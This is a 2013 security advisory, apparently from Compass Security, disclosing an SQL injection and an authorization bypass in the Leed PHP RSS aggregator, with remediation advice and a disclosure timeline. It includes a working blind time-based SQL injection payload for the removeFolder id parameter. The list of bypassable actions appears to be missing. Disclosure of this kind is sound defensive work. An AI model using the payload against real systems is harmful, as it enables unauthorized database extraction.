#############################################################
#############################################################
#############################################################
Leed is a lightweight RSS/ATOM aggregator based on PHP. It can be hosted
on any server supporting PHP and aims to be an alternative to Google
Reader and its substitutes. [1]
SQL injection (CSNC-2013-005 / CVE-2013-2627)
The SQL injection is within the ID parameter of
leed/action.php?action=removeFolder&id=-1 as user input does not get
properly escaped. Escaping is otherwise done consistently across the
remaining of the audited code. Exploiting this issue is tricky due to
the HTML encoding, but not impossible, e.g.
If select @@version returns '5.0.84-log' on your database,
CAST(@@version as signed) will return 5
Injection parameter (before encoding) would e.g. be
IF(CAST(@@version as signed) in(5),BENCHMARK(2000000,SHA1(0)),-1)
This blind SQL will last ~5 seconds on my installation as the condition
is true. This way, you could extract information one by one from the
mysql tables.
Authorization bypasses in action.php (CSNC-2013-007 / CVE-2013-2629)
The following actions can be called anonymously, as the $myUser variable
isn't verified:
Upgrade to the latest available version of Leed.
2013-12-18: Public disclosure date
2013-03-19: GIT commit of the fixes
2013-03-19: Initial vendor response
2013-03-19: Discovery by Alexandre Herzog & initial vendor notification
[1] http://projet.idleman.fr/leed/
–
Alexandre Herzog, IT Security Analyst, Compass Security AG
Werkstrasse 20, 8645 Jona, Switzerland
Schauplatzgasse 39, 3011 Bern, Switzerland
Tel: +41 55 214 41 66
http://www.csnc.ch/